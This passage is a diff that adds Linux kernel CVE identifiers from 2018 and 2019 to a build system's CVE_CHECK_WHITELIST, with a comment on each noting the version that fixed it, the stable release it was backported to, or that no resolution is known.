+# fixed-version: Fixed after version 4.17rc7
+CVE_CHECK_WHITELIST += "CVE-2018-11506"
+
+# fixed-version: Fixed after version 4.17rc5
+CVE_CHECK_WHITELIST += "CVE-2018-11508"
+
+# CVE-2018-11987 has no known resolution
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2018-12126"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2018-12127"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2018-12130"
+
+# fixed-version: Fixed after version 5.4rc2
+CVE_CHECK_WHITELIST += "CVE-2018-12207"
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2018-12232"
+
+# fixed-version: Fixed after version 4.18rc2
+CVE_CHECK_WHITELIST += "CVE-2018-12233"
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2018-12633"
+
+# fixed-version: Fixed after version 4.18rc2
+CVE_CHECK_WHITELIST += "CVE-2018-12714"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-12896"
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2018-12904"
+
+# CVE-2018-12928 has no known resolution
+
+# CVE-2018-12929 has no known resolution
+
+# CVE-2018-12930 has no known resolution
+
+# CVE-2018-12931 has no known resolution
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-13053"
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2018-13093"
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2018-13094"
+
+# fixed-version: Fixed after version 4.18rc3
+CVE_CHECK_WHITELIST += "CVE-2018-13095"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-13096"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-13097"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-13098"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-13099"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-13100"
+
+# fixed-version: Fixed after version 4.18rc4
+CVE_CHECK_WHITELIST += "CVE-2018-13405"
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2018-13406"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-14609"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-14610"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-14611"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-14612"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-14613"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-14614"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-14615"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-14616"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-14617"
+
+# fixed-version: Fixed after version 4.15rc4
+CVE_CHECK_WHITELIST += "CVE-2018-14619"
+
+# fixed-version: Fixed after version 4.20rc6
+CVE_CHECK_WHITELIST += "CVE-2018-14625"
+
+# fixed-version: Fixed after version 4.19rc6
+CVE_CHECK_WHITELIST += "CVE-2018-14633"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2018-14634"
+
+# fixed-version: Fixed after version 4.19rc4
+CVE_CHECK_WHITELIST += "CVE-2018-14641"
+
+# fixed-version: Fixed after version 4.15rc8
+CVE_CHECK_WHITELIST += "CVE-2018-14646"
+
+# fixed-version: Fixed after version 4.19rc2
+CVE_CHECK_WHITELIST += "CVE-2018-14656"
+
+# fixed-version: Fixed after version 4.18rc8
+CVE_CHECK_WHITELIST += "CVE-2018-14678"
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2018-14734"
+
+# fixed-version: Fixed after version 4.19rc7
+CVE_CHECK_WHITELIST += "CVE-2018-15471"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-15572"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-15594"
+
+# fixed-version: Fixed after version 4.18rc5
+CVE_CHECK_WHITELIST += "CVE-2018-16276"
+
+# fixed-version: Fixed after version 4.8rc1
+CVE_CHECK_WHITELIST += "CVE-2018-16597"
+
+# fixed-version: Fixed after version 4.19rc2
+CVE_CHECK_WHITELIST += "CVE-2018-16658"
+
+# fixed-version: Fixed after version 4.20rc5
+CVE_CHECK_WHITELIST += "CVE-2018-16862"
+
+# fixed-version: Fixed after version 4.20rc3
+CVE_CHECK_WHITELIST += "CVE-2018-16871"
+
+# fixed-version: Fixed after version 5.0rc5
+CVE_CHECK_WHITELIST += "CVE-2018-16880"
+
+# fixed-version: Fixed after version 4.20
+CVE_CHECK_WHITELIST += "CVE-2018-16882"
+
+# fixed-version: Fixed after version 5.0rc1
+CVE_CHECK_WHITELIST += "CVE-2018-16884"
+
+# CVE-2018-16885 has no known resolution
+
+# fixed-version: Fixed after version 4.19rc4
+CVE_CHECK_WHITELIST += "CVE-2018-17182"
+
+# fixed-version: Fixed after version 4.19rc7
+CVE_CHECK_WHITELIST += "CVE-2018-17972"
+
+# CVE-2018-17977 has no known resolution
+
+# fixed-version: Fixed after version 4.19rc7
+CVE_CHECK_WHITELIST += "CVE-2018-18021"
+
+# fixed-version: Fixed after version 4.19
+CVE_CHECK_WHITELIST += "CVE-2018-18281"
+
+# fixed-version: Fixed after version 4.15rc6
+CVE_CHECK_WHITELIST += "CVE-2018-18386"
+
+# fixed-version: Fixed after version 4.20rc5
+CVE_CHECK_WHITELIST += "CVE-2018-18397"
+
+# fixed-version: Fixed after version 4.19rc7
+CVE_CHECK_WHITELIST += "CVE-2018-18445"
+
+# fixed-version: Fixed after version 4.15rc2
+CVE_CHECK_WHITELIST += "CVE-2018-18559"
+
+# CVE-2018-18653 has no known resolution
+
+# fixed-version: Fixed after version 4.17rc4
+CVE_CHECK_WHITELIST += "CVE-2018-18690"
+
+# fixed-version: Fixed after version 4.20rc1
+CVE_CHECK_WHITELIST += "CVE-2018-18710"
+
+# fixed-version: Fixed after version 4.20rc2
+CVE_CHECK_WHITELIST += "CVE-2018-18955"
+
+# fixed-version: Fixed after version 4.20rc5
+CVE_CHECK_WHITELIST += "CVE-2018-19406"
+
+# fixed-version: Fixed after version 4.20rc5
+CVE_CHECK_WHITELIST += "CVE-2018-19407"
+
+# fixed-version: Fixed after version 4.20rc6
+CVE_CHECK_WHITELIST += "CVE-2018-19824"
+
+# fixed-version: Fixed after version 4.20rc3
+CVE_CHECK_WHITELIST += "CVE-2018-19854"
+
+# fixed-version: Fixed after version 4.20
+CVE_CHECK_WHITELIST += "CVE-2018-19985"
+
+# fixed-version: Fixed after version 4.20rc6
+CVE_CHECK_WHITELIST += "CVE-2018-20169"
+
+# fixed-version: Fixed after version 4.15rc2
+CVE_CHECK_WHITELIST += "CVE-2018-20449"
+
+# fixed-version: Fixed after version 4.14rc1
+CVE_CHECK_WHITELIST += "CVE-2018-20509"
+
+# fixed-version: Fixed after version 4.16rc3
+CVE_CHECK_WHITELIST += "CVE-2018-20510"
+
+# fixed-version: Fixed after version 4.19rc5
+CVE_CHECK_WHITELIST += "CVE-2018-20511"
+
+# fixed-version: Fixed after version 5.0rc1
+CVE_CHECK_WHITELIST += "CVE-2018-20669"
+
+# fixed-version: Fixed after version 5.0rc1
+CVE_CHECK_WHITELIST += "CVE-2018-20784"
+
+# fixed-version: Fixed after version 4.20rc1
+CVE_CHECK_WHITELIST += "CVE-2018-20836"
+
+# fixed-version: Fixed after version 4.20rc1
+CVE_CHECK_WHITELIST += "CVE-2018-20854"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-20855"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-20856"
+
+# fixed-version: Fixed after version 4.17rc1
+CVE_CHECK_WHITELIST += "CVE-2018-20961"
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2018-20976"
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2018-21008"
+
+# fixed-version: Fixed after version 4.15rc9
+CVE_CHECK_WHITELIST += "CVE-2018-25015"
+
+# fixed-version: Fixed after version 4.17rc7
+CVE_CHECK_WHITELIST += "CVE-2018-25020"
+
+# CVE-2018-3574 has no known resolution
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-3620"
+
+# fixed-version: Fixed after version 4.17rc7
+CVE_CHECK_WHITELIST += "CVE-2018-3639"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-3646"
+
+# fixed-version: Fixed after version 3.7rc1
+CVE_CHECK_WHITELIST += "CVE-2018-3665"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-3693"
+
+# fixed-version: Fixed after version 4.15rc8
+CVE_CHECK_WHITELIST += "CVE-2018-5332"
+
+# fixed-version: Fixed after version 4.15rc8
+CVE_CHECK_WHITELIST += "CVE-2018-5333"
+
+# fixed-version: Fixed after version 4.15rc8
+CVE_CHECK_WHITELIST += "CVE-2018-5344"
+
+# fixed-version: Fixed after version 4.18rc7
+CVE_CHECK_WHITELIST += "CVE-2018-5390"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-5391"
+
+# fixed-version: Fixed after version 4.16rc5
+CVE_CHECK_WHITELIST += "CVE-2018-5703"
+
+# fixed-version: Fixed after version 4.16rc1
+CVE_CHECK_WHITELIST += "CVE-2018-5750"
+
+# fixed-version: Fixed after version 4.16rc1
+CVE_CHECK_WHITELIST += "CVE-2018-5803"
+
+# fixed-version: Fixed after version 4.17rc6
+CVE_CHECK_WHITELIST += "CVE-2018-5814"
+
+# fixed-version: Fixed after version 4.16rc1
+CVE_CHECK_WHITELIST += "CVE-2018-5848"
+
+# Skipping CVE-2018-5856, no affected_versions
+
+# fixed-version: Fixed after version 4.11rc8
+CVE_CHECK_WHITELIST += "CVE-2018-5873"
+
+# fixed-version: Fixed after version 4.15rc2
+CVE_CHECK_WHITELIST += "CVE-2018-5953"
+
+# fixed-version: Fixed after version 4.15rc2
+CVE_CHECK_WHITELIST += "CVE-2018-5995"
+
+# fixed-version: Fixed after version 4.16rc5
+CVE_CHECK_WHITELIST += "CVE-2018-6412"
+
+# fixed-version: Fixed after version 4.17rc1
+CVE_CHECK_WHITELIST += "CVE-2018-6554"
+
+# fixed-version: Fixed after version 4.17rc1
+CVE_CHECK_WHITELIST += "CVE-2018-6555"
+
+# CVE-2018-6559 has no known resolution
+
+# fixed-version: Fixed after version 4.15rc9
+CVE_CHECK_WHITELIST += "CVE-2018-6927"
+
+# fixed-version: Fixed after version 4.14rc6
+CVE_CHECK_WHITELIST += "CVE-2018-7191"
+
+# fixed-version: Fixed after version 4.15rc2
+CVE_CHECK_WHITELIST += "CVE-2018-7273"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2018-7480"
+
+# fixed-version: Fixed after version 4.15rc3
+CVE_CHECK_WHITELIST += "CVE-2018-7492"
+
+# fixed-version: Fixed after version 4.16rc2
+CVE_CHECK_WHITELIST += "CVE-2018-7566"
+
+# fixed-version: Fixed after version 4.16rc7
+CVE_CHECK_WHITELIST += "CVE-2018-7740"
+
+# fixed-version: Fixed after version 4.15rc2
+CVE_CHECK_WHITELIST += "CVE-2018-7754"
+
+# fixed-version: Fixed after version 4.19rc5
+CVE_CHECK_WHITELIST += "CVE-2018-7755"
+
+# fixed-version: Fixed after version 4.16rc1
+CVE_CHECK_WHITELIST += "CVE-2018-7757"
+
+# fixed-version: Fixed after version 4.16rc5
+CVE_CHECK_WHITELIST += "CVE-2018-7995"
+
+# fixed-version: Fixed after version 4.16rc1
+CVE_CHECK_WHITELIST += "CVE-2018-8043"
+
+# fixed-version: Fixed after version 4.16rc1
+CVE_CHECK_WHITELIST += "CVE-2018-8087"
+
+# fixed-version: Fixed after version 4.16rc7
+CVE_CHECK_WHITELIST += "CVE-2018-8781"
+
+# fixed-version: Fixed after version 4.16rc7
+CVE_CHECK_WHITELIST += "CVE-2018-8822"
+
+# fixed-version: Fixed after version 4.16rc7
+CVE_CHECK_WHITELIST += "CVE-2018-8897"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-9363"
+
+# fixed-version: Fixed after version 4.17rc3
+CVE_CHECK_WHITELIST += "CVE-2018-9385"
+
+# fixed-version: Fixed after version 4.17rc3
+CVE_CHECK_WHITELIST += "CVE-2018-9415"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2018-9422"
+
+# fixed-version: Fixed after version 4.15rc6
+CVE_CHECK_WHITELIST += "CVE-2018-9465"
+
+# fixed-version: Fixed after version 4.18rc5
+CVE_CHECK_WHITELIST += "CVE-2018-9516"
+
+# fixed-version: Fixed after version 4.14rc1
+CVE_CHECK_WHITELIST += "CVE-2018-9517"
+
+# fixed-version: Fixed after version 4.16rc3
+CVE_CHECK_WHITELIST += "CVE-2018-9518"
+
+# fixed-version: Fixed after version 4.14rc4
+CVE_CHECK_WHITELIST += "CVE-2018-9568"
+
+# fixed-version: Fixed after version 5.2rc6
+CVE_CHECK_WHITELIST += "CVE-2019-0136"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-0145"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-0146"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-0147"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-0148"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-0149"
+
+# fixed-version: Fixed after version 5.4rc8
+CVE_CHECK_WHITELIST += "CVE-2019-0154"
+
+# fixed-version: Fixed after version 5.4rc8
+CVE_CHECK_WHITELIST += "CVE-2019-0155"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-10124"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-10125"
+
+# fixed-version: Fixed after version 5.2rc6
+CVE_CHECK_WHITELIST += "CVE-2019-10126"
+
+# CVE-2019-10140 has no known resolution
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-10142"
+
+# fixed-version: Fixed after version 5.3rc3
+CVE_CHECK_WHITELIST += "CVE-2019-10207"
+
+# fixed-version: Fixed after version 5.4rc2
+CVE_CHECK_WHITELIST += "CVE-2019-10220"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-10638"
+
+# fixed-version: Fixed after version 5.1rc4
+CVE_CHECK_WHITELIST += "CVE-2019-10639"
+
+# fixed-version: Fixed after version 5.0rc3
+CVE_CHECK_WHITELIST += "CVE-2019-11085"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-11091"
+
+# fixed-version: Fixed after version 5.4rc8
+CVE_CHECK_WHITELIST += "CVE-2019-11135"
+
+# fixed-version: Fixed after version 4.8rc5
+CVE_CHECK_WHITELIST += "CVE-2019-11190"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-11191"
+
+# fixed-version: Fixed after version 5.3rc4
+CVE_CHECK_WHITELIST += "CVE-2019-1125"
+
+# fixed-version: Fixed after version 5.2rc6
+CVE_CHECK_WHITELIST += "CVE-2019-11477"
+
+# fixed-version: Fixed after version 5.2rc6
+CVE_CHECK_WHITELIST += "CVE-2019-11478"
+
+# fixed-version: Fixed after version 5.2rc6
+CVE_CHECK_WHITELIST += "CVE-2019-11479"
+
+# fixed-version: Fixed after version 5.1rc4
+CVE_CHECK_WHITELIST += "CVE-2019-11486"
+
+# fixed-version: Fixed after version 5.1rc5
+CVE_CHECK_WHITELIST += "CVE-2019-11487"
+
+# fixed-version: Fixed after version 5.1rc6
+CVE_CHECK_WHITELIST += "CVE-2019-11599"
+
+# fixed-version: Fixed after version 5.1
+CVE_CHECK_WHITELIST += "CVE-2019-11683"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-11810"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-11811"
+
+# fixed-version: Fixed after version 5.1rc4
+CVE_CHECK_WHITELIST += "CVE-2019-11815"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-11833"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-11884"
+
+# fixed-version: Fixed after version 5.2rc3
+CVE_CHECK_WHITELIST += "CVE-2019-12378"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-12379"
+
+# fixed-version: Fixed after version 5.2rc3
+CVE_CHECK_WHITELIST += "CVE-2019-12380"
+
+# fixed-version: Fixed after version 5.2rc3
+CVE_CHECK_WHITELIST += "CVE-2019-12381"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-12382"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-12454"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-12455"
+
+# CVE-2019-12456 has no known resolution
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-12614"
+
+# fixed-version: Fixed after version 5.2rc4
+CVE_CHECK_WHITELIST += "CVE-2019-12615"
+
+# fixed-version: Fixed after version 5.2rc7
+CVE_CHECK_WHITELIST += "CVE-2019-12817"
+
+# fixed-version: Fixed after version 5.0
+CVE_CHECK_WHITELIST += "CVE-2019-12818"
+
+# fixed-version: Fixed after version 5.0rc8
+CVE_CHECK_WHITELIST += "CVE-2019-12819"
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2019-12881"
+
+# fixed-version: Fixed after version 5.2rc6
+CVE_CHECK_WHITELIST += "CVE-2019-12984"
+
+# fixed-version: Fixed after version 5.2rc4
+CVE_CHECK_WHITELIST += "CVE-2019-13233"
+
+# fixed-version: Fixed after version 5.2
+CVE_CHECK_WHITELIST += "CVE-2019-13272"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-13631"
+
+# fixed-version: Fixed after version 5.3rc2
+CVE_CHECK_WHITELIST += "CVE-2019-13648"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-14283"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-14284"
+
+# cpe-stable-backport: Backported in 5.4.12
+CVE_CHECK_WHITELIST += "CVE-2019-14615"
+
+# fixed-version: Fixed after version 4.17rc1
+CVE_CHECK_WHITELIST += "CVE-2019-14763"
+
+# fixed-version: Fixed after version 5.3
+CVE_CHECK_WHITELIST += "CVE-2019-14814"
+
+# fixed-version: Fixed after version 5.3
+CVE_CHECK_WHITELIST += "CVE-2019-14815"
+
+# fixed-version: Fixed after version 5.3
+CVE_CHECK_WHITELIST += "CVE-2019-14816"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-14821"
+
+# fixed-version: Fixed after version 5.3
+CVE_CHECK_WHITELIST += "CVE-2019-14835"
+
+# cpe-stable-backport: Backported in 5.4.12
+CVE_CHECK_WHITELIST += "CVE-2019-14895"
+
+# cpe-stable-backport: Backported in 5.4.16
+CVE_CHECK_WHITELIST += "CVE-2019-14896"
+
+# cpe-stable-backport: Backported in 5.4.16
+CVE_CHECK_WHITELIST += "CVE-2019-14897"
+
+# CVE-2019-14898 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.11
+CVE_CHECK_WHITELIST += "CVE-2019-14901"
+
+# fixed-version: Fixed after version 5.3rc8
+CVE_CHECK_WHITELIST += "CVE-2019-15030"
+
+# fixed-version: Fixed after version 5.3rc8
+CVE_CHECK_WHITELIST += "CVE-2019-15031"
+
+# fixed-version: Fixed after version 5.2rc2
+CVE_CHECK_WHITELIST += "CVE-2019-15090"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-15098"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-15099"
+
+# fixed-version: Fixed after version 5.3rc5
+CVE_CHECK_WHITELIST += "CVE-2019-15117"
+
+# fixed-version: Fixed after version 5.3rc5
+CVE_CHECK_WHITELIST += "CVE-2019-15118"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-15211"
+
+# fixed-version: Fixed after version 5.2rc3
+CVE_CHECK_WHITELIST += "CVE-2019-15212"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-15213"
+
+# fixed-version: Fixed after version 5.1rc6
+CVE_CHECK_WHITELIST += "CVE-2019-15214"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-15215"
+
+# fixed-version: Fixed after version 5.1
+CVE_CHECK_WHITELIST += "CVE-2019-15216"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-15217"
+
+# fixed-version: Fixed after version 5.2rc3
+CVE_CHECK_WHITELIST += "CVE-2019-15218"
+
+# fixed-version: Fixed after version 5.2rc3
+CVE_CHECK_WHITELIST += "CVE-2019-15219"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-15220"
+
+# fixed-version: Fixed after version 5.2
+CVE_CHECK_WHITELIST += "CVE-2019-15221"
+
+# fixed-version: Fixed after version 5.3rc3
+CVE_CHECK_WHITELIST += "CVE-2019-15222"
+
+# fixed-version: Fixed after version 5.2rc3
+CVE_CHECK_WHITELIST += "CVE-2019-15223"
+
+# CVE-2019-15239 has no known resolution
+
+# CVE-2019-15290 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.1
+CVE_CHECK_WHITELIST += "CVE-2019-15291"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-15292"
+
+# fixed-version: Fixed after version 5.3
+CVE_CHECK_WHITELIST += "CVE-2019-15504"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-15505"
+
+# fixed-version: Fixed after version 5.3rc6
+CVE_CHECK_WHITELIST += "CVE-2019-15538"
+
+# fixed-version: Fixed after version 5.1
+CVE_CHECK_WHITELIST += "CVE-2019-15666"
+
+# CVE-2019-15791 has no known resolution
+
+# CVE-2019-15792 has no known resolution
+
+# CVE-2019-15793 has no known resolution
+
+# CVE-2019-15794 needs backporting (fixed from 5.12)
+
+# fixed-version: Fixed after version 5.2rc3
+CVE_CHECK_WHITELIST += "CVE-2019-15807"
+
+# CVE-2019-15902 has no known resolution
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-15916"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-15917"
+
+# fixed-version: Fixed after version 5.1rc6
+CVE_CHECK_WHITELIST += "CVE-2019-15918"
+
+# fixed-version: Fixed after version 5.1rc6
+CVE_CHECK_WHITELIST += "CVE-2019-15919"
+
+# fixed-version: Fixed after version 5.1rc6
+CVE_CHECK_WHITELIST += "CVE-2019-15920"
+
+# fixed-version: Fixed after version 5.1rc3
+CVE_CHECK_WHITELIST += "CVE-2019-15921"
+
+# fixed-version: Fixed after version 5.1rc4
+CVE_CHECK_WHITELIST += "CVE-2019-15922"
+
+# fixed-version: Fixed after version 5.1rc4
+CVE_CHECK_WHITELIST += "CVE-2019-15923"
+
+# fixed-version: Fixed after version 5.1rc4
+CVE_CHECK_WHITELIST += "CVE-2019-15924"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-15925"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-15926"
+
+# fixed-version: Fixed after version 5.0rc2
+CVE_CHECK_WHITELIST += "CVE-2019-15927"
+
+# CVE-2019-16089 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.7
+CVE_CHECK_WHITELIST += "CVE-2019-16229"
+
+# cpe-stable-backport: Backported in 5.4.7
+CVE_CHECK_WHITELIST += "CVE-2019-16230"
+
+# fixed-version: Fixed after version 5.4rc6
+CVE_CHECK_WHITELIST += "CVE-2019-16231"
+
+# cpe-stable-backport: Backported in 5.4.7
+CVE_CHECK_WHITELIST += "CVE-2019-16232"
+
+# fixed-version: Fixed after version 5.4rc5
+CVE_CHECK_WHITELIST += "CVE-2019-16233"
+
+# fixed-version: Fixed after version 5.4rc4
+CVE_CHECK_WHITELIST += "CVE-2019-16234"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-16413"
+
+# fixed-version: Fixed after version 5.3rc7
+CVE_CHECK_WHITELIST += "CVE-2019-16714"
+
+# fixed-version: Fixed after version 5.4rc2
+CVE_CHECK_WHITELIST += "CVE-2019-16746"
+
+# fixed-version: Fixed after version 4.17rc1
+CVE_CHECK_WHITELIST += "CVE-2019-16921"
+
+# fixed-version: Fixed after version 5.0
+CVE_CHECK_WHITELIST += "CVE-2019-16994"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-16995"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-17052"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-17053"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-17054"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-17055"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-17056"
+
+# fixed-version: Fixed after version 5.4rc3
+CVE_CHECK_WHITELIST += "CVE-2019-17075"
+
+# fixed-version: Fixed after version 5.4rc4
+CVE_CHECK_WHITELIST += "CVE-2019-17133"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-17351"
+
+# fixed-version: Fixed after version 5.4rc6
+CVE_CHECK_WHITELIST += "CVE-2019-17666"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-18198"
+
+# fixed-version: Fixed after version 5.4rc6
+CVE_CHECK_WHITELIST += "CVE-2019-18282"
+
+# cpe-stable-backport: Backported in 5.4.1
+CVE_CHECK_WHITELIST += "CVE-2019-18660"
+
+# fixed-version: Fixed after version 4.17rc5
+CVE_CHECK_WHITELIST += "CVE-2019-18675"
+
+# CVE-2019-18680 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.1
+CVE_CHECK_WHITELIST += "CVE-2019-18683"
+
+# cpe-stable-backport: Backported in 5.4.7
+CVE_CHECK_WHITELIST += "CVE-2019-18786"
+
+# fixed-version: Fixed after version 5.1rc7
+CVE_CHECK_WHITELIST += "CVE-2019-18805"
+
+# fixed-version: Fixed after version 5.4rc2
+CVE_CHECK_WHITELIST += "CVE-2019-18806"
+
+# fixed-version: Fixed after version 5.4rc2
+CVE_CHECK_WHITELIST += "CVE-2019-18807"
+
+# cpe-stable-backport: Backported in 5.4.56
+CVE_CHECK_WHITELIST += "CVE-2019-18808"
+
+# cpe-stable-backport: Backported in 5.4.9
+CVE_CHECK_WHITELIST += "CVE-2019-18809"
+
+# fixed-version: Fixed after version 5.4rc2
+CVE_CHECK_WHITELIST += "CVE-2019-18810"
+
+# fixed-version: Fixed after version 5.4rc7
+CVE_CHECK_WHITELIST += "CVE-2019-18811"
+
+# fixed-version: Fixed after version 5.4rc7
+CVE_CHECK_WHITELIST += "CVE-2019-18812"
+
+# fixed-version: Fixed after version 5.4rc6
+CVE_CHECK_WHITELIST += "CVE-2019-18813"
+
+# cpe-stable-backport: Backported in 5.4.43
+CVE_CHECK_WHITELIST += "CVE-2019-18814"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-18885"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19036"
+
+# cpe-stable-backport: Backported in 5.4.7
+CVE_CHECK_WHITELIST += "CVE-2019-19037"
+
